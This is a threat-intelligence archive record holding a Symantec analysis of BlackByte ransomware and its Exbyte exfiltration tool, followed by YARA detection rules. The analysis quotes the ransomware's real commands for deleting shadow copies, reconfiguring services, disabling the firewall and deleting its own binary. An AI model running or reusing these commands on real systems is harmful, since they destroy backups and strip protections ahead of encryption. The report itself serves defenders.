{
	"id": "4be3c3bd-f12c-4e4c-9e35-18a58002b26d",
	"created_at": "2026-04-06T00:14:50.219771Z",
	"updated_at": "2026-04-10T03:32:24.841539Z",
	"deleted_at": null,
	"sha1_hash": "387a288ffe3fdb98d70c7e0a8e0fd047a945d1ab",
	"title": "Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 71840,
	"plain_text": "Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool\r\nArchived: 2026-04-05 14:21:47 UTC\r\nSymantec’s Threat Hunter Team has discovered that at least one affiliate of the BlackByte ransomware (Ransom.Blackbyte) operation has begun using a custom data exfiltration tool during their attacks. The malware (Infostealer.Exbyte) is designed to expedite the theft of data from the victim’s network and upload it to an external server.\r\nBlackByte is a ransomware-as-a-service operation that is run by a cyber-crime group Symantec calls Hecamede. The group sprang to public attention in February 2022 when the U.S. Federal Bureau of Investigation (FBI) issued an alert stating that BlackByte had been used to attack multiple entities in the U.S., including organizations in at least three critical infrastructure sectors. In recent months, BlackByte has become one of the most frequently used payloads in ransomware attacks.\r\nInside Exbyte\r\nThe Exbyte exfiltration tool is written in Go and designed to upload stolen files to the Mega.co.nz cloud storage service.\r\nOn execution, Exbyte performs a series of checks for indicators that it may be running in a sandboxed environment. This is intended to make it more difficult for security researchers to analyze the malware. To do this, it calls the IsDebuggerPresent and CheckRemoteDebuggerPresent APIs. It then checks for the running processes from the following applications:\r\nMegaDumper 1.0 by CodeCracker / SnD\r\nImport reconstructor\r\nx64dbg\r\nx32dbg\r\nOLLYDBG\r\nWinDbg\r\nThe Interactive Disassembler\r\nImmunity Debugger - [CPU]\r\nIt then checks for the following anti-virus or sandbox-related files:\r\navghooka.dll\r\navghookx.dll\r\nsxin.dll\r\nsf2.dll\r\nsbiedll.dll\r\nsnxhk.dll\r\ncmdvrt32.dll\r\ncmdvrt64.dll\r\nwpespy.dll\r\nvmcheck.dll\r\npstorec.dll\r\ndir_watch.dll\r\napi_log.dll\r\ndbghelp.dll\r\nThis routine of checks is quite similar to the routine employed by the BlackByte payload itself, as documented recently by Sophos.\r\nNext, Exbyte enumerates all document files on the infected computer, such as .txt, .doc, and .pdf files, and saves the full path and file name to %APPDATA%\\dummy. The files listed are then uploaded to a folder the malware creates on Mega.co.nz. Credentials for the Mega account used are hardcoded into Exbyte.\r\nExbyte is not the first custom-developed data exfiltration tool to be linked to a ransomware operation. In November 2021, Symantec discovered Exmatter, an exfiltration tool that was used by the BlackMatter ransomware operation and has since been used in Noberus attacks. Other examples include the Ryuk Stealer tool and StealBit, which is linked to the LockBit ransomware.\r\nBlackByte TTPs\r\nIn recent BlackByte attacks investigated by Symantec, the attackers exploited the ProxyShell (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) and ProxyLogon (CVE-2021-26855 and CVE-2021-27065) vulnerabilities in Microsoft Exchange Servers to gain initial access.\r\nhttps://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware\r\nPage 1 of 4\r\nSymantec has observed attackers using AdFind, AnyDesk, NetScan, and PowerView prior to deploying the ransomware payload.\r\nRecent attacks have used version 2.0 of the BlackByte payload. On execution, the ransomware payload itself appears to download and save debugging symbols from Microsoft. The command is executed directly from the ransomware:\r\npowershell -command \"(New-Object Net.WebClient).DownloadFile('http://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/11D60DB07BA7433B923F49867DF515721/ntkrnlmp.pdb', 'CSIDL_SYSTEM_DRIVE\\systemdata\\ntkrnlmp.pdb')\"\r\nThe ransomware then checks the version information of ntoskrnl.exe and then creates a service with the following details:\r\nbinPath = C:\\systemdata\\generalate\r\ndisplayName = AAAAAAAAAAAAAA!!!!!!!!!!!!!!!\r\nBlackByte then proceeds with the removal of Kernel Notify Routines. The purpose of this is to attempt to bypass EDR products. This functionality in BlackByte has already been documented by Sophos and it closely resembles the techniques leveraged in the EDRSandblast tool.\r\nBlackByte uses VssAdmin to delete volume shadow copies and resize storage allocation:\r\ncmd.exe /c start vssadmin.exe Delete Shadows /All /Quiet\r\nvssadmin Resize ShadowStorage /For=K: /On=K: /MaxSize=401MB\r\nIt then makes the following service modifications:\r\nsc create ODosTEmONa binPath= CSIDL_SYSTEM_DRIVE\\systemdata\\generalate type= kernel\r\nsc.exe config RemoteRegistry start= auto\r\nsc.exe config Dnscache start= auto\r\nsc.exe config SSDPSRV start= auto\r\nsc.exe config fdPHost start= auto\r\nsc.exe config upnphost start= auto\r\nThe ransomware then modifies firewall settings to enable linked connections:\r\nnetsh advfirewall firewall set rule \"group=\\\"Network Discovery\\\" \" new enable=Yes\"\r\nnetsh advfirewall firewall set rule \"group=\\\"File and Printer Sharing\\\" \" new enable=Yes\"\r\ncmd.exe /c netsh advfirewall set allprofiles state off\r\nFinally, BlackByte injects itself into an instance of svchost.exe, conducts file encryption, and then deletes the ransomware binary on disk:\r\ncmd.exe /c ping 1.1.1.1 -n 10 \u003e Nul \u0026 Del CSIDL_WINDOWS\\rdac.exe /F /Q\r\nCSIDL_SYSTEM\\svchost.exe -s 27262842\r\nEmerging Force\r\nFollowing the departure of a number of major ransomware operations such as Conti and Sodinokibi, BlackByte has emerged as one of the ransomware actors to profit from this gap in the market. The fact that actors are now creating custom tools for use in BlackByte attacks suggests that it may be on the way to becoming one of the dominant ransomware threats.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nYara Rule\r\nrule blackbyte_exfil\r\n{\r\n    meta:\r\n        copyright = \"Symantec\"\r\n        family = \"Alias:ExfilTool\"\r\n        description = \"Detects exfil tool used by BlackByte ransomware\"\r\n    strings:\r\n        $data_str1 = {41 B9 04 00 00 00 66 66 0F 1F 84 00 00 00 00 00\r\n                      43 0F B6 84 02 A0 00 00 00 41 30 00 49 FF C0 49\r\n                      83 E9 01 75 EB 49 83 EB 01 75 D5 40 B7 09 48 8D}\r\n        $data_str2 = {32 10 05 AF 59 2E 0D 38 32 59 C0 99 E8 A5 87 CB}\r\n        $data_str3 = \"@BCEFHJLNPRTVY\" ascii\r\n    condition:\r\n        all of ($data_str*)\r\n        and filesize \u003e 2MB and filesize \u003c 3MB and\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\n}\r\nrule blackbyte_exfil_unpacked\r\n{\r\n    meta:\r\n        copyright = \"Symantec\"\r\n        family = \"Alias:ExfilTool\"\r\n        description = \"Detects unpacked exfil tool used by BlackByte ransomware\"\r\n    strings:\r\n        $str1 = \").Login\"\r\n        $str2 = \").NewUpload\"\r\n        $str3 = \").CreateDir\"\r\n        $str4 = \".PreloginMsg\"\r\n        $str5 = \".UploadCompleteMsg\"\r\n        $str6 = \").UploadFile\"\r\n        $str7 = {FF 20 47 6F 20 62 75 69 6C 64 69 6E 66 3A 08 02\r\n                 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n                 07 75 6E 6B 6E 6F 77 6E 00 00 00 00 00 00 00 00}\r\n        $c1 = {44 24 68 44 31 C2 88 50 10 0F B6 54 24 56 44 0F}\r\n        $c2 = {FB 48 89 F7 4C 89 C6 E8 54 ED F6 FF 4C 8D 43 01}\r\n    condition:\r\n        all of ($str*) and ($c1 or $c2)\r\n        and filesize \u003e 8MB and\r\n        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)\r\n}\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.\r\nSHA256 file hashes:\r\nNetwork:\r\nSource: https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware"
	],
	"report_names": [
		"blackbyte-exbyte-ransomware"
	],
	"threat_actors": [
		{
			"id": "4e453d66-9ecd-47d9-b63a-32fa5450f071",
			"created_at": "2024-06-19T02:03:08.077075Z",
			"updated_at": "2026-04-10T02:00:03.830523Z",
			"deleted_at": null,
			"main_name": "GOLD LOTUS",
			"aliases": [
				"BlackByte",
				"Hecamede"
			],
			"source_name": "Secureworks:GOLD LOTUS",
			"tools": [
				"BlackByte",
				"Cobalt Strike",
				"ExByte",
				"Mega",
				"RDP",
				"SoftPerfect Network Scanner"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4e7fd07d-fcc5-459b-b678-45a7d9cda751",
			"created_at": "2025-04-23T02:00:55.174827Z",
			"updated_at": "2026-04-10T02:00:05.353712Z",
			"deleted_at": null,
			"main_name": "BlackByte",
			"aliases": [
				"BlackByte",
				"Hecamede"
			],
			"source_name": "MITRE:BlackByte",
			"tools": [
				"AdFind",
				"BlackByte Ransomware",
				"Exbyte",
				"Arp",
				"BlackByte 2.0 Ransomware",
				"PsExec",
				"Cobalt Strike",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434490,
	"ts_updated_at": 1775791944,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/387a288ffe3fdb98d70c7e0a8e0fd047a945d1ab.pdf",
		"text": "https://archive.orkl.eu/387a288ffe3fdb98d70c7e0a8e0fd047a945d1ab.txt",
		"img": "https://archive.orkl.eu/387a288ffe3fdb98d70c7e0a8e0fd047a945d1ab.jpg"
	}
}